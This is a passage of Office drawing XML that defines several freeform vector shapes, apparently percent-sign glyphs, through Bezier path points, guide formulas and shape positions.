                    <a:pt x="11" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="149"/>
                    <a:pt x="73" y="114"/>
                    <a:pt x="73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0" name="Freeform 1046">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE958FA6-AA7A-43AE-A24A-AEAF27DFDB1F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795962" y="612775"/>
              <a:ext cx="47625" cy="152400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9 h 390"/>
                <a:gd name="T8" fmla="*/ 4 w 126"/>
                <a:gd name="T9" fmla="*/ 16 h 390"/>
                <a:gd name="T10" fmla="*/ 101 w 126"/>
                <a:gd name="T11" fmla="*/ 195 h 390"/>
                <a:gd name="T12" fmla="*/ 10 w 126"/>
                <a:gd name="T13" fmla="*/ 369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3" y="89"/>
                    <a:pt x="85" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="28"/>
                    <a:pt x="23" y="0"/>
                    <a:pt x="11" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="0" y="9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3" y="75"/>
                    <a:pt x="101" y="160"/>
                    <a:pt x="101" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="248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3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1" name="Freeform 1047">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825CF345-F5EB-4573-936F-791E37D039CB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5918200" y="727075"/>
              <a:ext cx="20638" cy="22225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2" name="Freeform 1048">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B561A90-3FD1-45DA-8310-6DC052088E63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5984875" y="612775"/>
              <a:ext cx="85725" cy="152400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 79 w 224"/>
                <a:gd name="T1" fmla="*/ 64 h 390"/>
                <a:gd name="T2" fmla="*/ 40 w 224"/>
                <a:gd name="T3" fmla="*/ 0 h 390"/>
                <a:gd name="T4" fmla="*/ 0 w 224"/>
                <a:gd name="T5" fmla="*/ 63 h 390"/>
                <a:gd name="T6" fmla="*/ 40 w 224"/>
                <a:gd name="T7" fmla="*/ 127 h 390"/>
                <a:gd name="T8" fmla="*/ 79 w 224"/>
                <a:gd name="T9" fmla="*/ 64 h 390"/>
                <a:gd name="T10" fmla="*/ 197 w 224"/>
                <a:gd name="T11" fmla="*/ 13 h 390"/>
                <a:gd name="T12" fmla="*/ 184 w 224"/>
                <a:gd name="T13" fmla="*/ 0 h 390"/>
                <a:gd name="T14" fmla="*/ 170 w 224"/>
                <a:gd name="T15" fmla="*/ 13 h 390"/>
                <a:gd name="T16" fmla="*/ 30 w 224"/>
                <a:gd name="T17" fmla="*/ 368 h 390"/>
                <a:gd name="T18" fmla="*/ 27 w 224"/>
                <a:gd name="T19" fmla="*/ 377 h 390"/>
                <a:gd name="T20" fmla="*/ 40 w 224"/>
                <a:gd name="T21" fmla="*/ 390 h 390"/>
                <a:gd name="T22" fmla="*/ 51 w 224"/>
                <a:gd name="T23" fmla="*/ 382 h 390"/>
                <a:gd name="T24" fmla="*/ 194 w 224"/>
                <a:gd name="T25" fmla="*/ 22 h 390"/>
                <a:gd name="T26" fmla="*/ 197 w 224"/>
                <a:gd name="T27" fmla="*/ 13 h 390"/>
                <a:gd name="T28" fmla="*/ 224 w 224"/>
                <a:gd name="T29" fmla="*/ 327 h 390"/>
                <a:gd name="T30" fmla="*/ 184 w 224"/>
                <a:gd name="T31" fmla="*/ 263 h 390"/>
                <a:gd name="T32" fmla="*/ 144 w 224"/>
                <a:gd name="T33" fmla="*/ 327 h 390"/>
                <a:gd name="T34" fmla="*/ 184 w 224"/>
                <a:gd name="T35" fmla="*/ 390 h 390"/>
                <a:gd name="T36" fmla="*/ 224 w 224"/>
                <a:gd name="T37" fmla="*/ 327 h 390"/>
                <a:gd name="T38" fmla="*/ 61 w 224"/>
                <a:gd name="T39" fmla="*/ 63 h 390"/>
                <a:gd name="T40" fmla="*/ 40 w 224"/>
                <a:gd name="T41" fmla="*/ 105 h 390"/>
                <a:gd name="T42" fmla="*/ 19 w 224"/>
                <a:gd name="T43" fmla="*/ 63 h 390"/>
                <a:gd name="T44" fmla="*/ 40 w 224"/>
                <a:gd name="T45" fmla="*/ 22 h 390"/>
                <a:gd name="T46" fmla="*/ 61 w 224"/>
                <a:gd name="T47" fmla="*/ 63 h 390"/>
                <a:gd name="T48" fmla="*/ 205 w 224"/>
                <a:gd name="T49" fmla="*/ 327 h 390"/>
                <a:gd name="T50" fmla="*/ 184 w 224"/>
                <a:gd name="T51" fmla="*/ 368 h 390"/>
                <a:gd name="T52" fmla="*/ 163 w 224"/>
                <a:gd name="T53" fmla="*/ 327 h 390"/>
                <a:gd name="T54" fmla="*/ 184 w 224"/>
                <a:gd name="T55" fmla="*/ 285 h 390"/>
                <a:gd name="T56" fmla="*/ 205 w 224"/>
                <a:gd name="T57" fmla="*/ 32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390">
                  <a:moveTo>
                    <a:pt x="79" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="27"/>
                    <a:pt x="62" y="0"/>
                    <a:pt x="40" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="0"/>
                    <a:pt x="0" y="28"/>
                    <a:pt x="0" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="100"/>
                    <a:pt x="17" y="127"/>
                    <a:pt x="40" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="127"/>
                    <a:pt x="79" y="99"/>
                    <a:pt x="79" y="64"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="197" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="6"/>
                    <a:pt x="191" y="0"/>
                    <a:pt x="184" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="0"/>
                    <a:pt x="172" y="8"/>
                    <a:pt x="170" y="13"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="30" y="368"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="372"/>
                    <a:pt x="27" y="375"/>
                    <a:pt x="27" y="377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="384"/>
                    <a:pt x="33" y="390"/>
                    <a:pt x="40" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="390"/>
                    <a:pt x="50" y="386"/>
                    <a:pt x="51" y="382"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="194" y="22"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="18"/>
                    <a:pt x="197" y="15"/>
                    <a:pt x="197" y="13"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="224" y="327"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="292"/>
                    <a:pt x="208" y="263"/>
                    <a:pt x="184" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="263"/>
                    <a:pt x="144" y="292"/>
                    <a:pt x="144" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="362"/>
                    <a:pt x="161" y="390"/>
                    <a:pt x="184" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="390"/>
                    <a:pt x="224" y="362"/>
                    <a:pt x="224" y="327"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="61" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="90"/>
                    <a:pt x="47" y="105"/>
                    <a:pt x="40" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="105"/>
                    <a:pt x="19" y="90"/>
                    <a:pt x="19" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="39"/>
                    <a:pt x="32" y="22"/>
                    <a:pt x="40" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="22"/>
                    <a:pt x="61" y="39"/>
                    <a:pt x="61" y="63"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="205" y="327"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="353"/>
                    <a:pt x="191" y="368"/>
                    <a:pt x="184" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="368"/>
                    <a:pt x="163" y="353"/>
                    <a:pt x="163" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="300"/>
                    <a:pt x="177" y="285"/>
                    <a:pt x="184" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="285"/>
                    <a:pt x="205" y="300"/>
                    <a:pt x="205" y="3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3" name="Freeform 1049">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{280C7C0C-C3C3-4560-BA6F-1E8463E54B73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6083300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3 w 232"/>
                <a:gd name="T5" fmla="*/ 191 h 212"/>
                <a:gd name="T6" fmla="*/ 125 w 232"/>
                <a:gd name="T7" fmla="*/ 103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5 w 232"/>
                <a:gd name="T25" fmla="*/ 21 h 212"/>
                <a:gd name="T26" fmla="*/ 95 w 232"/>
                <a:gd name="T27" fmla="*/ 11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3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2 h 212"/>
                <a:gd name="T52" fmla="*/ 60 w 232"/>
                <a:gd name="T53" fmla="*/ 191 h 212"/>
                <a:gd name="T54" fmla="*/ 115 w 232"/>
                <a:gd name="T55" fmla="*/ 116 h 212"/>
                <a:gd name="T56" fmla="*/ 171 w 232"/>
                <a:gd name="T57" fmla="*/ 191 h 212"/>
                <a:gd name="T58" fmla="*/ 140 w 232"/>
                <a:gd name="T59" fmla="*/ 202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5" y="103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1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3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6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2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4" name="Freeform 1050">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB0E2AA8-8A24-4470-A98F-14E2D7147BCE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6218237" y="727075"/>
              <a:ext cx="20638" cy="22225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5" name="Freeform 1051">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47049EE1-784B-46AB-B3A2-9249F3080834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6286500" y="612775"/>
              <a:ext cx="84138" cy="152400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 79 w 223"/>
                <a:gd name="T1" fmla="*/ 64 h 390"/>
                <a:gd name="T2" fmla="*/ 39 w 223"/>
                <a:gd name="T3" fmla="*/ 0 h 390"/>
                <a:gd name="T4" fmla="*/ 0 w 223"/>
                <a:gd name="T5" fmla="*/ 63 h 390"/>
                <a:gd name="T6" fmla="*/ 39 w 223"/>
                <a:gd name="T7" fmla="*/ 127 h 390"/>
                <a:gd name="T8" fmla="*/ 79 w 223"/>
                <a:gd name="T9" fmla="*/ 64 h 390"/>
                <a:gd name="T10" fmla="*/ 197 w 223"/>
                <a:gd name="T11" fmla="*/ 13 h 390"/>
                <a:gd name="T12" fmla="*/ 184 w 223"/>
                <a:gd name="T13" fmla="*/ 0 h 390"/>
                <a:gd name="T14" fmla="*/ 170 w 223"/>
                <a:gd name="T15" fmla="*/ 13 h 390"/>
                <a:gd name="T16" fmla="*/ 29 w 223"/>
                <a:gd name="T17" fmla="*/ 368 h 390"/>
                <a:gd name="T18" fmla="*/ 26 w 223"/>
                <a:gd name="T19" fmla="*/ 377 h 390"/>
                <a:gd name="T20" fmla="*/ 39 w 223"/>
                <a:gd name="T21" fmla="*/ 390 h 390"/>
                <a:gd name="T22" fmla="*/ 51 w 223"/>
                <a:gd name="T23" fmla="*/ 382 h 390"/>
                <a:gd name="T24" fmla="*/ 194 w 223"/>
                <a:gd name="T25" fmla="*/ 22 h 390"/>
                <a:gd name="T26" fmla="*/ 197 w 223"/>
                <a:gd name="T27" fmla="*/ 13 h 390"/>
                <a:gd name="T28" fmla="*/ 223 w 223"/>
                <a:gd name="T29" fmla="*/ 327 h 390"/>
                <a:gd name="T30" fmla="*/ 184 w 223"/>
                <a:gd name="T31" fmla="*/ 263 h 390"/>
                <a:gd name="T32" fmla="*/ 144 w 223"/>
                <a:gd name="T33" fmla="*/ 327 h 390"/>
                <a:gd name="T34" fmla="*/ 184 w 223"/>
                <a:gd name="T35" fmla="*/ 390 h 390"/>
                <a:gd name="T36" fmla="*/ 223 w 223"/>
                <a:gd name="T37" fmla="*/ 327 h 390"/>
                <a:gd name="T38" fmla="*/ 60 w 223"/>
                <a:gd name="T39" fmla="*/ 63 h 390"/>
                <a:gd name="T40" fmla="*/ 39 w 223"/>
                <a:gd name="T41" fmla="*/ 105 h 390"/>
                <a:gd name="T42" fmla="*/ 18 w 223"/>
                <a:gd name="T43" fmla="*/ 63 h 390"/>
                <a:gd name="T44" fmla="*/ 39 w 223"/>
                <a:gd name="T45" fmla="*/ 22 h 390"/>
                <a:gd name="T46" fmla="*/ 60 w 223"/>
                <a:gd name="T47" fmla="*/ 63 h 390"/>
                <a:gd name="T48" fmla="*/ 205 w 223"/>
                <a:gd name="T49" fmla="*/ 327 h 390"/>
                <a:gd name="T50" fmla="*/ 184 w 223"/>
                <a:gd name="T51" fmla="*/ 368 h 390"/>
                <a:gd name="T52" fmla="*/ 162 w 223"/>
                <a:gd name="T53" fmla="*/ 327 h 390"/>
                <a:gd name="T54" fmla="*/ 184 w 223"/>
                <a:gd name="T55" fmla="*/ 285 h 390"/>
                <a:gd name="T56" fmla="*/ 205 w 223"/>
                <a:gd name="T57" fmla="*/ 32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" h="390">
                  <a:moveTo>
                    <a:pt x="79" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="27"/>
                    <a:pt x="62" y="0"/>
                    <a:pt x="39" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="0"/>
                    <a:pt x="0" y="28"/>
                    <a:pt x="0" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="100"/>
                    <a:pt x="17" y="127"/>
                    <a:pt x="39" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="127"/>
                    <a:pt x="79" y="99"/>
                    <a:pt x="79" y="64"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="197" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="6"/>
                    <a:pt x="191" y="0"/>
                    <a:pt x="184" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="0"/>
                    <a:pt x="172" y="8"/>
                    <a:pt x="170" y="13"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="29" y="368"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="372"/>
                    <a:pt x="26" y="375"/>
                    <a:pt x="26" y="377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="384"/>
                    <a:pt x="32" y="390"/>
                    <a:pt x="39" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="390"/>
                    <a:pt x="49" y="386"/>
                    <a:pt x="51" y="382"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="194" y="22"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="18"/>
                    <a:pt x="197" y="15"/>
                    <a:pt x="197" y="13"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="223" y="327"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="292"/>
                    <a:pt x="207" y="263"/>
                    <a:pt x="184" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="263"/>
                    <a:pt x="144" y="292"/>
                    <a:pt x="144" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="362"/>
                    <a:pt x="160" y="390"/>
                    <a:pt x="184" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="390"/>
                    <a:pt x="223" y="362"/>
                    <a:pt x="223" y="327"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="60" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="90"/>
                    <a:pt x="47" y="105"/>
                    <a:pt x="39" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="105"/>
                    <a:pt x="18" y="90"/>
                    <a:pt x="18" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="39"/>
                    <a:pt x="31" y="22"/>
                    <a:pt x="39" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="22"/>
                    <a:pt x="60" y="39"/>
                    <a:pt x="60" y="63"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="205" y="327"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="353"/>
                    <a:pt x="191" y="368"/>
                    <a:pt x="184" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="368"/>
                    <a:pt x="162" y="353"/>
                    <a:pt x="162" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="300"/>
                    <a:pt x="176" y="285"/>
                    <a:pt x="184" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="285"/>
                    <a:pt x="205" y="300"/>
                    <a:pt x="205" y="3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6" name="Freeform 1052">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E663BDBF-C3E8-4290-A2E4-3A370F9807C1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6384925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2 w 232"/>
                <a:gd name="T19" fmla="*/ 11 h 212"/>
                <a:gd name="T20" fmla="*/ 163 w 232"/>
                <a:gd name="T21" fmla="*/ 21 h 212"/>
                <a:gd name="T22" fmla="*/ 114 w 232"/>
                <a:gd name="T23" fmla="*/ 88 h 212"/>
                <a:gd name="T24" fmla="*/ 65 w 232"/>
                <a:gd name="T25" fmla="*/ 21 h 212"/>
                <a:gd name="T26" fmla="*/ 95 w 232"/>
                <a:gd name="T27" fmla="*/ 11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4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6 w 232"/>
                <a:gd name="T49" fmla="*/ 212 h 212"/>
                <a:gd name="T50" fmla="*/ 91 w 232"/>
                <a:gd name="T51" fmla="*/ 202 h 212"/>
                <a:gd name="T52" fmla="*/ 60 w 232"/>
                <a:gd name="T53" fmla="*/ 191 h 212"/>
                <a:gd name="T54" fmla="*/ 114 w 232"/>
                <a:gd name="T55" fmla="*/ 116 h 212"/>
                <a:gd name="T56" fmla="*/ 170 w 232"/>
                <a:gd name="T57" fmla="*/ 191 h 212"/>
                <a:gd name="T58" fmla="*/ 140 w 232"/>
                <a:gd name="T59" fmla="*/ 202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1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1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2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="191"/>
                    <a:pt x="83" y="191"/>
                    <a:pt x="60" y="191"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="114" y="116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2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7" name="Freeform 1053">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C11BF46-C3DB-4A4D-8F66-6C41BED1C00B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6518275" y="727075"/>
              <a:ext cx="20638" cy="22225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6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3"/>
                    <a:pt x="12" y="54"/>
                    <a:pt x="26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8" name="Freeform 1054">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D90FEA6-FCA5-4496-AD62-51DFFF643814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6586537" y="612775"/>
              <a:ext cx="85725" cy="152400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 80 w 224"/>
                <a:gd name="T1" fmla="*/ 64 h 390"/>
                <a:gd name="T2" fmla="*/ 40 w 224"/>
                <a:gd name="T3" fmla="*/ 0 h 390"/>
                <a:gd name="T4" fmla="*/ 0 w 224"/>
                <a:gd name="T5" fmla="*/ 63 h 390"/>
                <a:gd name="T6" fmla="*/ 40 w 224"/>
                <a:gd name="T7" fmla="*/ 127 h 390"/>
                <a:gd name="T8" fmla="*/ 80 w 224"/>
                <a:gd name="T9" fmla="*/ 64 h 390"/>
                <a:gd name="T10" fmla="*/ 197 w 224"/>
                <a:gd name="T11" fmla="*/ 13 h 390"/>
                <a:gd name="T12" fmla="*/ 184 w 224"/>
                <a:gd name="T13" fmla="*/ 0 h 390"/>
                <a:gd name="T14" fmla="*/ 170 w 224"/>
                <a:gd name="T15" fmla="*/ 13 h 390"/>
                <a:gd name="T16" fmla="*/ 30 w 224"/>
                <a:gd name="T17" fmla="*/ 368 h 390"/>
                <a:gd name="T18" fmla="*/ 27 w 224"/>
                <a:gd name="T19" fmla="*/ 377 h 390"/>
                <a:gd name="T20" fmla="*/ 40 w 224"/>
                <a:gd name="T21" fmla="*/ 390 h 390"/>
                <a:gd name="T22" fmla="*/ 52 w 224"/>
                <a:gd name="T23" fmla="*/ 382 h 390"/>
                <a:gd name="T24" fmla="*/ 194 w 224"/>
                <a:gd name="T25" fmla="*/ 22 h 390"/>
                <a:gd name="T26" fmla="*/ 197 w 224"/>
                <a:gd name="T27" fmla="*/ 13 h 390"/>
                <a:gd name="T28" fmla="*/ 224 w 224"/>
                <a:gd name="T29" fmla="*/ 327 h 390"/>
                <a:gd name="T30" fmla="*/ 184 w 224"/>
                <a:gd name="T31" fmla="*/ 263 h 390"/>
                <a:gd name="T32" fmla="*/ 145 w 224"/>
                <a:gd name="T33" fmla="*/ 327 h 390"/>
                <a:gd name="T34" fmla="*/ 184 w 224"/>
                <a:gd name="T35" fmla="*/ 390 h 390"/>
                <a:gd name="T36" fmla="*/ 224 w 224"/>
                <a:gd name="T37" fmla="*/ 327 h 390"/>
                <a:gd name="T38" fmla="*/ 61 w 224"/>
                <a:gd name="T39" fmla="*/ 63 h 390"/>
                <a:gd name="T40" fmla="*/ 40 w 224"/>
                <a:gd name="T41" fmla="*/ 105 h 390"/>
                <a:gd name="T42" fmla="*/ 19 w 224"/>
                <a:gd name="T43" fmla="*/ 63 h 390"/>
                <a:gd name="T44" fmla="*/ 40 w 224"/>
                <a:gd name="T45" fmla="*/ 22 h 390"/>
                <a:gd name="T46" fmla="*/ 61 w 224"/>
                <a:gd name="T47" fmla="*/ 63 h 390"/>
                <a:gd name="T48" fmla="*/ 205 w 224"/>
                <a:gd name="T49" fmla="*/ 327 h 390"/>
                <a:gd name="T50" fmla="*/ 184 w 224"/>
                <a:gd name="T51" fmla="*/ 368 h 390"/>
                <a:gd name="T52" fmla="*/ 163 w 224"/>
                <a:gd name="T53" fmla="*/ 327 h 390"/>
                <a:gd name="T54" fmla="*/ 184 w 224"/>
                <a:gd name="T55" fmla="*/ 285 h 390"/>
                <a:gd name="T56" fmla="*/ 205 w 224"/>
                <a:gd name="T57" fmla="*/ 32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390">
                  <a:moveTo>
                    <a:pt x="80" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="27"/>
                    <a:pt x="63" y="0"/>
                    <a:pt x="40" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="0"/>
                    <a:pt x="0" y="28"/>
                    <a:pt x="0" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="100"/>
                    <a:pt x="17" y="127"/>
                    <a:pt x="40" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="127"/>
                    <a:pt x="80" y="99"/>
                    <a:pt x="80" y="64"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="197" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="6"/>
                    <a:pt x="191" y="0"/>
                    <a:pt x="184" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="0"/>
                    <a:pt x="172" y="8"/>
                    <a:pt x="170" y="13"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="30" y="368"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="372"/>
                    <a:pt x="27" y="375"/>
                    <a:pt x="27" y="377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="384"/>
                    <a:pt x="33" y="390"/>
                    <a:pt x="40" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="390"/>
                    <a:pt x="50" y="386"/>
                    <a:pt x="52" y="382"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="194" y="22"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="18"/>
                    <a:pt x="197" y="15"/>
                    <a:pt x="197" y="13"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="224" y="327"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="292"/>
                    <a:pt x="208" y="263"/>
                    <a:pt x="184" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="263"/>
                    <a:pt x="145" y="292"/>
                    <a:pt x="145" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="362"/>
                    <a:pt x="161" y="390"/>
                    <a:pt x="184" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="390"/>
                    <a:pt x="224" y="362"/>
                    <a:pt x="224" y="327"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="61" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="90"/>
                    <a:pt x="47" y="105"/>
                    <a:pt x="40" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="105"/>
                    <a:pt x="19" y="90"/>
                    <a:pt x="19" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="39"/>
                    <a:pt x="32" y="22"/>
                    <a:pt x="40" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="22"/>
                    <a:pt x="61" y="39"/>
                    <a:pt x="61" y="63"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="205" y="327"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="353"/>
                    <a:pt x="191" y="368"/>
                    <a:pt x="184" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="368"/>
                    <a:pt x="163" y="353"/>
                    <a:pt x="163" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="300"/>
                    <a:pt x="177" y="285"/>
                    <a:pt x="184" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="285"/>
                    <a:pt x="205" y="300"/>
                    <a:pt x="205" y="3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9" name="Freeform 1055">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8DDC0E8-203F-4976-94A9-9B25920D5EF6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684962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3 w 232"/>
                <a:gd name="T5" fmla="*/ 191 h 212"/>
                <a:gd name="T6" fmla="*/ 126 w 232"/>
                <a:gd name="T7" fmla="*/ 103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9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6 w 232"/>
                <a:gd name="T25" fmla="*/ 21 h 212"/>
                <a:gd name="T26" fmla="*/ 96 w 232"/>
                <a:gd name="T27" fmla="*/ 11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3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2 h 212"/>
                <a:gd name="T52" fmla="*/ 61 w 232"/>
                <a:gd name="T53" fmla="*/ 191 h 212"/>
                <a:gd name="T54" fmla="*/ 115 w 232"/>
                <a:gd name="T55" fmla="*/ 116 h 212"/>
                <a:gd name="T56" fmla="*/ 171 w 232"/>
                <a:gd name="T57" fmla="*/ 191 h 212"/>
                <a:gd name="T58" fmla="*/ 141 w 232"/>
                <a:gd name="T59" fmla="*/ 202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6" y="103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9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3" y="21"/>
